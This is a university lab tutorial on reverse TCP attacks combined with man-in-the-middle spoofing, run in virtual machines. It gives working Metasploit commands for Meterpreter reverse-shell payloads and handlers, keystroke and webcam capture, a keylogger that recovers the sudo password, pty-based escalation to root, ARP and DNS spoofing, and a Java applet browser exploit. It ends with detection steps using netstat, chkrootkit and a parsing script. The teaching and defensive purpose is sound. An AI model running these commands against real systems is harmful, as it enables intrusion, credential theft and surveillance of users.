MITM and reverse TCP attacks

Mikhail Zolotukhin and Timo Hämäläinen

Department of Mathematical Information Technology, University of Jyväskylä
1 Introduction
Man-in-the-middle attacks can be combined with such dangerous attacks as the reverse TCP connection. A firewall usually blocks open (inbound) ports but does not block outgoing traffic, so a reverse connection is used to bypass firewall and router security restrictions. For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet. Once the connection is established, the remote host can send commands to the Trojan horse. Trojan horses that use a reverse connection usually send TCP SYN packets to the attacker's IP address. The attacker listens for these SYN packets and accepts the desired connections.
In this tutorial, it is shown how to establish a reverse TCP connection between a client and the attacker, which has the latest BackTrack 5 installed. How to configure an attacker virtual machine with BackTrack 5 is shown in the previous tutorial. The remainder of this tutorial is organized as follows. Several preliminary tasks are presented in Section 2. Reverse connection attacks against Windows 7 and Ubuntu 12.04 are described in Section 3 and Section 4 respectively. In Section 5, it is shown how an MITM attack can help an attacker to establish the reverse TCP connection. Security issues related to reverse connection attacks are presented in Section 6. Some simple assignments are listed in Section 7. Section 8 concludes the tutorial.
2 Preliminary questions
What is Metasploit? What is it used for?
Briefly explain the reverse TCP attack.
How can the attacker execute a simple exploit on the victim machine?
Check the article http://www.netresec.com/?page=Blog&month=2011-07&post=How-to-detect-reverse-https-backdoors. What simple indicators can be used to detect Metasploit's reverse HTTPS Meterpreter sessions?
3 Reverse connection attack for Windows 7
1. Start the following machines: gateway, dnsdhcp, the client with Windows 7 (if you have it) and the attacker with BackTrack 5.
2. On the attacker, open a terminal and check your IP address with the ifconfig command. In my case it is 192.168.1.102.
3. Then run the following command to create a Windows executable file named Executive.exe, which will be saved on the attacker's desktop:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.102 X > Desktop/Executive.exe
where 192.168.1.102 is the attacker IP address.
4. Copy this .exe file to the Windows 7 client. For this purpose you can use VirtualBox shared folders (http://www.virtualbox.org/manual/ch04.html#sharedfolders), a USB device (http://www.dedoimedo.com/computers/virtualbox-usb.html), or send it to the client by email. Once the file is on the Windows 7 client, copy it to the desktop.
5. Go back to the attacker and create a handler for the connection that will come to the attacker from the exploit we have just created. For this purpose, open the Metasploit console in the terminal:
msfconsole
wait until the console opens (you will see a prompt like msf >) and type the following commands in this console:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit
where 192.168.1.102 is the attacker IP address. Wait until the payload handler has started.
6. Now execute the file we have already copied to the client (Executive.exe) and see whether the handler on the attacker receives something. In case of success you will see a message that a new Meterpreter session has opened, and Meterpreter will automatically switch to this session. If not, you can find the started session by listing all open sessions; type the following in the msfconsole of the attacker:
sessions -l
then find the number of the session just created (in my case it is 1) and, to interact with this session, type
sessions -i 1
where 1 is the id of the new session.
7. Now the attacker is inside the client and can use the following commands:
pwd, cd, ls - to navigate
search - to search for files on the client machine
upload - to upload files to the client
download - to download files from the client
screenshot - to take a screenshot of the client's desktop
webcam snap - to take a picture with the client's web camera
keyscan start - to start recording which keys are pressed on the client's keyboard
keyscan stop - to stop key recording
keyscan dump - to dump the captured keys while recording is running
Try some of these commands.
4 Reverse connection attack for Ubuntu 12.04
1. Start the following machines: gateway, dnsdhcp, the client with Ubuntu 12.04 and the attacker with BackTrack 5.
2. Check the attacker IP address with the ifconfig command. In my case it is 192.168.1.102.
3. Then run the following command to create an executable file named Executive:
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8888 X >> Executive
where 192.168.1.102 is the attacker IP address and 8888 is any available port. Make this file executable:
chmod u=rwx Executive
4. Copy this file to the Ubuntu client and put it on the desktop. Make it executable:
cd Desktop
chmod u=rwx Executive
5. Go back to the attacker and create a handler for the connection that will come to the attacker from the exploit we have just created:
msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8888 E
where 192.168.1.102 is the attacker IP address and 8888 is the port you used when creating Executive. Wait until the payload handler has started.
6. Double-click the Executive binary on the client. Nothing visible happens, but we get a reverse shell on our listener. In case of success you will see a message that a new Meterpreter session has opened, and Meterpreter will automatically switch to this session. If not, you can find the started session by listing all open sessions; type the following in the msfconsole of the attacker:
sessions -l
then find the number of the session just created (in my case it is 1) and, to interact with this session, type
sessions -i 1
where 1 is the id of the new session.
7. From the attacker machine, download the special script from http://users.jyu.fi/~mizolotu/download.php?file=files/keylog.sh and put it in the same directory from which you started the reverse connection handler. This script is self-explanatory: it gets the xinput ID of the keyboard and dumps the xmodmap and keystrokes to the /tmp/.xkey.log file.
8. Upload keylog.sh to the client by typing in the Meterpreter console:
upload keylog.sh
make it executable
shell
chmod u=rwx keylog.sh
and run the script:
./keylog.sh
When it asks for KBD ID, enter the id of the keyboard from the list (in my case it is the last entry in the list, called Dell USB Entry Keyboard, and has ID 9) and press Enter. Terminate the shell session; the keylogger keeps running in the background.
9. On the client machine, open a terminal and run any command that requires superuser privileges, e.g. sudo su, and enter your password (if you use the VM downloaded from the course web page, it most likely is client).
10. On the attacker download the .xkey.log from the /tmp folder by running in the meterpreter console:
cd /tmp
download .xkey.log
11. Download the keylog decoder from http://users.jyu.fi/~mizolotu/download.php?file=files/keylog_reader.sh and put it in the same directory where .xkey.log is now located on the attacker machine. Run this script and you will figure out the sudo password.
12. In the Meterpreter console type
shell
and try to get sudo privileges:
sudo su
You cannot do it and get the error: 3 incorrect password attempts.
13. To bypass this problem (sudo needs a terminal to read the password from, and the plain Meterpreter shell has none), spawn a pseudo-terminal by typing
python -c 'import pty; pty.spawn("/bin/bash")'
and enter the sudo password. To make sure that you have sudo privileges, type
whoami
and
id
5 Combination of MITM and reverse connection attacks
As you may have noticed, in the previous sections we ran an executable file on the client machine to create a reverse connection to the attacker. However, in the real world a user will not run untrusted executable files on his own computer. Man-in-the-middle attacks can be used to redirect the user to the attacker's web site and then perform the reverse connection attack. You can use Python scripts for ARP poisoning and DNS spoofing as described in the DNS spoofing tutorial, but here we simply use software already available on BackTrack 5.
1. Start the following machines: gateway, dnsdhcp, the client with Windows 7 and the attacker with BackTrack 5.
2. On the attacker machine, open a terminal and start ARP poisoning:
arpspoof -i eth0 -t 192.168.1.101 192.168.1.2
where
eth0 is the attacker's network interface
192.168.1.101 is the client's IP
192.168.1.2 is the DNS server IP.
3. Create a simple .txt file, put the line
192.168.1.102 www.youtube.com
into it and save it as dns.txt. Here 192.168.1.102 is the attacker IP address and www.youtube.com is the web site name which will be redirected to the attacker.
4. Open another terminal and start DNS spoofing:
dnsspoof -i eth0 -f dns.txt
where
eth0 is the attacker's network interface
dns.txt is the name of the file just created.
5. Enable IP forwarding on the attacker:
sysctl -w net.ipv4.ip_forward=1
6. Open a new terminal and run the reverse TCP attack as follows:
msfcli exploit/multi/browser/java_signed_applet PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8888 SRVHOST=192.168.1.102 SRVPORT=80 URIPATH=/ E
where
192.168.1.102 is the attacker's IP address
8888 is the port the handler listens on
80 is the standard port used by HTTP.
As you can see, this command uses the Java applet exploit and creates a TCP connection handler on the attacker. If somebody goes to 192.168.1.102 in the Internet browser and runs the applet there, the TCP connection to the attacker will be established. If there is an error saying that port 80 is already in use, stop the Apache server: Applications > BackTrack > Services > HTTPD > apache stop.
7. In order to test this attack on the client, download and install Java on it: http://www.java.com/en/download/help/windows_manual_download.xml. Now navigate to www.youtube.com in the client's browser. For the sake of demonstration, answer Allow/Yes/Accept in all warning dialogues. In case of success, a new Meterpreter session will start on the attacker machine.
6 Security issues
One easy way to detect a reverse TCP connection attack is to use the netstat command.
1. Perform the reverse TCP attack on the Ubuntu 12.04 client as described in Section 4.
2. Netstat shows all network connections of the client. Type in the terminal
netstat --tcp
to see all TCP connections. Type
netstat --tcp --numeric
to show IP addresses instead of domain names. Finally, run
netstat --tcp --numeric --programs
to see which programs use those TCP connections.
3. If the Internet connection is taken down and an application still tries to connect to remote hosts, it may be infected with malware. Taking this into account, disable networking on the client:
sudo ifconfig eth0 down
Wait for a while and periodically run netstat --tcp --numeric --programs or netstat -tnp. If after some time a connection remains ESTABLISHED, you can mark it as suspicious. In my case, after a few minutes I had only one connection and it was related to the malicious file Executive.
4. Find the program Executive in the list produced by netstat -tnp and check what PID it has. To find files related to this application use
lsof -p PID
and stop it with
kill -9 PID
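The persistence check in step 3 can be automated. The Python below is an added example, not part of the tutorial: it parses two `netstat -tnp` snapshots (constructed sample output, with made-up addresses, PIDs and program names) and reports the connections that stayed ESTABLISHED across both snapshots while the interface was down, together with the PID to pass to lsof and kill.

```python
from typing import Dict, List, Tuple

# Constructed sample output of `netstat -tnp`: two snapshots taken a few minutes apart
# on the Ubuntu client after `sudo ifconfig eth0 down`. Addresses, PIDs and program
# names are made up for this example.
SNAPSHOT_1 = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.1.101:41872     192.168.1.2:53          TIME_WAIT   -
tcp        0      0 192.168.1.101:52210     203.0.113.10:443        ESTABLISHED 2201/firefox
tcp        0      0 192.168.1.101:38651     192.168.1.102:8888      ESTABLISHED 2419/Executive
"""
SNAPSHOT_2 = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.1.101:38651     192.168.1.102:8888      ESTABLISHED 2419/Executive
"""

Endpoint = Tuple[str, str]      # (local addr:port, foreign addr:port)
Owner = Tuple[str, int, str]    # (state, pid or -1 when unknown, program name)


def parse_netstat(output: str) -> Dict[Endpoint, Owner]:
    """Parse the TCP rows of `netstat -tnp` into {endpoints: (state, pid, program)}."""
    conns: Dict[Endpoint, Owner] = {}
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0] != "tcp":
            continue                      # skip banner, header and non-TCP rows
        pid_str, _, program = fields[6].partition("/")   # "2419/Executive" or "-"
        pid = int(pid_str) if pid_str.isdigit() else -1
        conns[(fields[3], fields[4])] = (fields[5], pid, program)
    return conns


def persistent_established(first: str, second: str) -> List[dict]:
    """Connections still ESTABLISHED in both snapshots while the link is down."""
    earlier, later = parse_netstat(first), parse_netstat(second)
    suspicious = []
    for key, (state, pid, program) in later.items():
        if state == "ESTABLISHED" and earlier.get(key, ("", -1, ""))[0] == "ESTABLISHED":
            suspicious.append({"local": key[0], "remote": key[1], "pid": pid, "program": program})
    return suspicious


if __name__ == "__main__":
    for hit in persistent_established(SNAPSHOT_1, SNAPSHOT_2):
        print(f"{hit['program']} (PID {hit['pid']}) -> {hit['remote']}: "
              f"inspect with 'lsof -p {hit['pid']}', stop with 'kill -9 {hit['pid']}'")
```

On a live client, replace the constructed snapshots with the saved output of two `netstat -tnp` runs a few minutes apart.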
Another option is to use special software for intrusion and malware detection. For example, in Ubuntu you can try to install and run Rootkit Hunter, chkrootkit, Clam AntiVirus, Avast, Tiger, etc.
1. Perform the reverse TCP attack on the Ubuntu 12.04 client as described in Section 4. Upload the keylogger to the client, make it executable and run it.
2. On the client, install chkrootkit:
sudo apt-get install chkrootkit
3. Run chkrootkit as follows:
sudo chkrootkit
After the scan is completed, you can notice that it cannot find the tty (controlling terminal) of the processes related to xinput used in the attacker's keylogger, which may look suspicious, especially if you know that you did not run xinput.
7 Assignment
1. Answer the preliminary questions and briefly explain the results obtained in the tutorial.
2. Add to the report the results obtained with netstat.
3. Add to the report the results obtained with chkrootkit.
4. Write general comments about the tutorial: what was interesting, difficult, etc.
Write a report (in English) that includes the answers to the assignments above and send it to mizolotu@jyu.fi.
8 Conclusion
In this tutorial, it has been shown how to perform the reverse TCP attack and how the MITM approach
can help the attacker to do it. Finally, some simple techniques to detect this attack have been considered.
